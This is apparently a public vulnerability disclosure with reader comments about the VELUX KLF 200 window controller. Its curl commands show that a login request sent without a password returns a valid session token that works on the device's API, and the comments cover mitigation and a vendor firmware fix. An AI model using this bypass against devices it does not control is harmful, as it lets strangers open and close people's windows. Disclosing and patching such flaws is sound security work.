Velux security flaw within KLF 200

velux.md

Security Flaw within VELUX KLF 200

Another episode of Internet Of Things done wrong. This exploit is so trivial, i would not even call it exploit.

Introduction

VELUX[0] is the leading manufacturer of roof windows (They are really great!). VELUX KLF 200 is a device to control VELUX windows over ethernet/internet[1]. The KLF 200 device has an undocumented API for executing scenes, with other words opening and closing velux windows.

Description of security flaw

Expected behaviour with correct password:

 *  julius@macbook ~:$ curl 'http://192.168.2.127/api/v1/auth' -X POST -d '{"action":"login","params":{"password":"velux123"}}'
)]}',
{"token":"6XmONGhWRF5Wcu4XrTHZLA==","result":true,"deviceStatus":"IDLE","data":{},"errors":[]}

Expected behaviour with wrong password:

 *  julius@macbook ~:$ curl 'http://192.168.2.127/api/v1/auth' -X POST -d '{"action":"login","params":{"password":"fnord"}}'
)]}',
{"result":false,"deviceStatus":"IDLE","data":{},"errors":[401]}

Login without password token:

 *  julius@macbook ~:$ curl 'http://192.168.2.127/api/v1/auth' -X POST -d '{"action":"login"}'
)]}',
{"token":"6XmONGhWRF5Wcu4XrTHZLA==","result":false,"deviceStatus":"IDLE","data":{},"errors":[999]}

... returning a valid token:

 *  julius@macbook ~:$ curl 'http://192.168.2.127/api/v1/products' -H 'Authorization: Bearer 6XmONGhWRF5Wcu4XrTHZLA=='  -X POST -d '{"action":"get"}'
)]}',
{"token":"6XmONGhWRF5Wcu4XrTHZLA==","result":true,"deviceStatus":"IDLE","data":[...],"errors":[]}

I assume this is not expected behaviour

Software version

Current version:0.1.1.0.41.0

[0] http://www.velux.com/ [1] http://velcdn.azureedge.net/~/media/marketing/de/dokumente/pdf/produktanleitungen/produktdatenblatt/integra/velux-produktdatenblatt-integra-interface-klf200.pdf?la=de-de

nicely done

Hi,

I have also just 3hrs ago got my KLF200 I feel it is very frustrating as I can not get the programs to load - hoping to link it to Home Assistant as there is a component available but no data how to run the programs etc.

could you explain the above as though i was a 2 year old as I think I am getting confused with the tokens

This issue is in effect only if there's an active session. To mitigate the impact, you can invalidate the session by using the logout button or by running this command:
curl 'http://192.168.2.127/api/v1/auth' -X POST -d '{"action":"logout","params":{}}' -H 'Authorization: Bearer 6XmONGhWRF5Wcu4XrTHZLA=='
(insert your authorization token)

@VELUX: Please provide a software update to your customers! It shouldn't be too hard, I guess.

Velux say they have an updated version of the firmware which fixes this issue: https://updates2.velux.com/ Did not try it out yet.

It's pretty much an empty page :|

Still empty, 2 months later...

try: https://updates2.velux.com/download/3119c782-c708-456f-a75b-dee45f9402ec

It is version KLF200-v1.1.0.44.bin from ~3. April 2018
My last devices (I got it today) has already 0.1.1.0.45.0

Hello, beware, my German ist nicht gut, but I managed to understand that all the scenes are deleted during the upgrade process, and the rediscovery of the shutters and getting them paired was pretty hectic for the user reporting it.

@Sven-H-x how did you manage to get this link? Do you by any chance have release note?

Maybe somebody want's to continue hacking here: https://updates2.velux.com/download (self documented API, I didn't test whether there is a security issue as well)

Thanks for input. This feature has been classified as a bug and is fixed in latest firmware update with version 2.0.0.71.
Be aware that KLF200 interface has been changed from HTTP to SLIP.
Here is a link to our official page with changelog and API dokumentation.
https://www.velux.com/api/klf200